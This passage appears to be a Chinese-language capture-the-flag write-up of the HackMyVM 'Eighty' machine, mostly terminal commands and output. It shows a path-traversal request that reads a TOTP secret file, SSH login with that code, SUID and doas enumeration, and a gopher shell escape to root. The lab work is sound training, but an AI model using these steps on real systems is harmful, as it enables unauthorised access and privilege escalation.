\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl http:\/\/susan.eighty.hmv\/web..\/secret\/.google-auth.txt \n2GN7KARBONVR55R7SP3UZPN3ZM\n" RATE_LIMIT 3 30\n" WINDOW_SIZE 17\n" DISALLOW_REUSE\n" TOTP_AUTH\n71293338\n48409754\n27074208\n60216448\n17908010<\/code><\/pre>\n\u53d1\u73b0\u662fTOTP_AUTH<\/code>\uff1a<\/p>\n\nTOTP\uff08Time-based One-Time Password\uff0c\u57fa\u4e8e\u65f6\u95f4\u7684\u4e00\u6b21\u6027\u5bc6\u7801\uff09\u662f\u4e00\u79cd\u5e7f\u6cdb\u5e94\u7528\u4e8e\u53cc\u56e0\u7d20\u8eab\u4efd\u9a8c\u8bc1\uff082FA\uff09\u7684\u52a8\u6001\u5bc6\u7801\u6280\u672f\uff0c\u901a\u8fc7\u7ed3\u5408\u5171\u4eab\u5bc6\u94a5\u548c\u65f6\u95f4\u6233\u751f\u6210\u77ed\u671f\u6709\u6548\u7684\u9a8c\u8bc1\u7801\u3002<\/p>\n<\/blockquote>\n
<\/div><\/p>\n\u4f46\u662f\u8fd9\u4e2a\u7528\u4e0d\u4e86\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n
<\/div><\/p>\n\u53f3\u4e0a\u89d2\u6253\u5f00\u63d2\u4ef6\uff0c\u8eab\u4efd\u9a8c\u8bc1\u5668 > \u6dfb\u52a0\u8d26\u53f7 > \u624b\u52a8\u8f93\u5165 > susan:2GN7KARBONVR55R7SP3UZPN3ZM<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c ssh \u767b\u5f55\uff0c\u8fc7\u671f\u5c31\u6362\u4e00\u4e2a\uff01<\/p>\n
\u5bc6\u7801\u8981\u586b8ycrois-tu0<\/code>\uff08\u4e0d\u77e5\u9053\u548b\u51fa\u6765\u7684\u53ef\u4ee5ctrl+f<\/code>\u770b\u4e00\u4e0b\u7b2c\u4e00\u6b21\u51fa\u73b0\u5728\u54ea\uff09,\u8ba4\u8bc1\u7801\u5c31\u586b\u521a\u521a\u63d2\u4ef6\u7ed9\u7684\uff1a<\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nsusan@eighty:~$ ls -la\ntotal 52\ndrwxr-xr-x 6 susan susan 4096 Jun 13 20:48 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw-r--r-- 1 susan susan 220 Apr 7 2021 .bash_logout\n-rw-r--r-- 1 susan susan 3526 Apr 7 2021 .bashrc\n-rwx--x--x 1 susan susan 1920 Apr 7 2021 flag.sh\ndrwx------ 3 susan susan 4096 Apr 7 2021 .gnupg\n-r-------- 1 susan susan 156 Jun 13 20:48 .google_authenticator\ndrwxr-xr-x 3 susan susan 4096 Apr 7 2021 .local\n-rw-r--r-- 1 susan susan 807 Apr 7 2021 .profile\ndrwxr-xr-x 2 susan susan 4096 Apr 7 2021 secret\n-rw------- 1 susan susan 12 Apr 7 2021 user.txt\ndrwxr-xr-x 2 susan susan 4096 Apr 7 2021 web\n-rw------- 1 susan susan 52 Apr 7 2021 .Xauthority\nsusan@eighty:~$ cat user.txt \nhmv8use0red\nsusan@eighty:~$ .\/flag.sh \n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: eighty\n\\nPWNED DATE: Fri 13 Jun 2025 08:50:05 PM EDT\n\\nWHOAMI: uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: hmv8use0red\n\\n------------------------\n\nsusan@eighty:~$ sudo -l\n-bash: sudo: command not found\n\nsusan@eighty:~$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsusan\nsshd\nhenry\n\nsusan@eighty:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/local\/bin\/doas\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/mount<\/code><\/pre>\n\u53d1\u73b0doas<\/code>\u7684SUID<\/code>\u6743\u9650\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7528\u6765\u4ee3\u66ff sudo \u770b\u4e00\u4e0b\u662f\u548b\u7528\u7684\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ tldr doas \n\n Executes a command as another user.\n More information: <https:\/\/man.openbsd.org\/doas>.\n\n Run a command as root:\n\n doas command\n\n Run a command as another user:\n\n doas -u user command\n\n Launch the default shell as root:\n\n doas -s\n\n Parse a configuration file and check if the execution of a command as another user is allowed:\n\n doas -C config_file command\n\n Make `doas` request a password even after it was supplied earlier:\n\n doas -L<\/code><\/pre>\n\u770b\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
<\/div><\/p>\n\u4f46\u662f\u6211\u5728\u76ee\u6807\u4e3b\u673a\u6ca1\u770b\u5230\u76f8\u5173\u76ee\u5f55\uff1a<\/p>\n
susan@eighty:~$ find \/ -name "*doas*" 2>\/dev\/null\n\/usr\/local\/etc\/doas.conf\n\/usr\/local\/share\/man\/man1\/doas.1\n\/usr\/local\/share\/man\/man8\/vidoas.8\n\/usr\/local\/share\/man\/man5\/doas.conf.5\n\/usr\/local\/bin\/vidoas\n\/usr\/local\/bin\/doas<\/code><\/pre>\n\u4f7f\u7528 find \u627e\u5230\u4e86\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
susan@eighty:~$ cat \/usr\/local\/etc\/doas.conf\npermit nolog susan as root cmd gopher<\/code><\/pre>\n\u8bf4\u660e susan<\/code>\u53ef\u4ee5\u7528root<\/code>\u6267\u884cgopher<\/code>\uff1a\u770b\u4e00\u4e0b\u8fd9\u4e2a\u662f\u5565\uff0c\u4f3c\u4e4e\u548c\u6211\u719f\u6089\u7684\u90a3\u4e2a\u534f\u8bae\u770b\u4e0a\u53bb\u4e0d\u592a\u4e00\u6837\uff1a<\/p>\nsusan@eighty:~$ gopher -h\ngopher: invalid option -- 'h'\nUsage: gopher [-sSbDr] [-T type] [-p path] [-t title] [hostname port]+\n -s secure mode, users without own account\n -S secure mode, users with own account\n -p path specify path to initial item\n -T type Type of initial item\n -i Search argument (for -T 7)\n -b Bookmarks first\n -r Remote user\n -D Debug mode<\/code><\/pre>\n\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
susan@eighty:~$ \/usr\/local\/bin\/doas -u root gopher\nPassword: 8ycrois-tu0\nWelcome to the wonderful world of Gopher!\n\nGopher has limitations on its use and comes without\na warranty. Please refer to the file 'Copyright' included\nin the distribution.\n\nInternet Gopher Information Client 3.0 patch12 (FurryTerror)\nCopyright (C) 1991-2000 by the Regents of the University of Minnesota\nCopyright (C) 2000-2005 John Goerzen and the gopher developers\n\nPress RETURN to continue<\/code><\/pre>\n\u968f\u4fbf\u6309\u4e00\u4e2a\u952e\u8fdb\u5165\u754c\u9762\uff0c\u5c1d\u8bd5\u641c\u5bfb\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u7684\u5730\u65b9\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0!, $ : Shell Escape (Unix) or Spawn subprocess (VMS).<\/code>\u5c1d\u8bd5\u8fdb\u884c\u9003\u9038\uff1a\u8f93\u5165\u4fe9u<\/code>\u8fdb\u5165\u6700\u5f00\u59cb\u7684\u754c\u9762\uff0c\u7136\u540e\u8f93\u5165!<\/code>\u53d1\u73b0\u8fdb\u5165shell\uff01<\/p>\n<\/div><\/p>\nroot@eighty:\/home\/susan# cd ~\nroot@eighty:~# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Jun 13 21:04 .\ndrwxr-xr-x 18 root root 4096 Apr 7 2021 ..\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Apr 7 2021 .gnupg\n-rw-r--r-- 1 root root 0 Jun 13 21:04 .gopherrc\ndrwxr-xr-x 3 root root 4096 Apr 7 2021 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rwx--x--x 1 root root 1920 Apr 7 2021 fl4g.sh\n-rw------- 1 root root 13 Apr 7 2021 r0ot.txt\nroot@eighty:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@eighty:~# .\/fl4g.sh\n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: eighty\n\\nPWNED DATE: Fri Jun 13 21:10:02 EDT 2025\n\\nWHOAMI: uid=0(root) gid=0(root) groups=0(root)\n\\nFLAG: rooted80shmv\n\\n------------------------<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/nepcodex.com\/2023\/01\/writeup-eighty-hackmyvm-walkthrough\/<\/a><\/p>\n
![\"image-20250614084143934\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910911.png\")
<\/div><\/p>\n![\"image-20250614084234164\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910912.png\")
<\/div><\/p>\n![\"image-20250614084628254\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910913.png\")
<\/div><\/p>\n![\"image-20250614084837513\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910914.png\")
<\/div><\/p>\n![\"image-20250614085632429\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910915.png\")
<\/div><\/p>\n![\"image-20250614090553008\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910916.png\")
<\/div>![\"image-20250614090625964\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910917.png\")
<\/div>![\"image-20250614090801463\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910918.png\")
<\/div>![\"image-20250614090812350\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910919.png\")
<\/div><\/p>\n![\"image-20250614090942208\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910920.png\")
<\/div><\/p>\n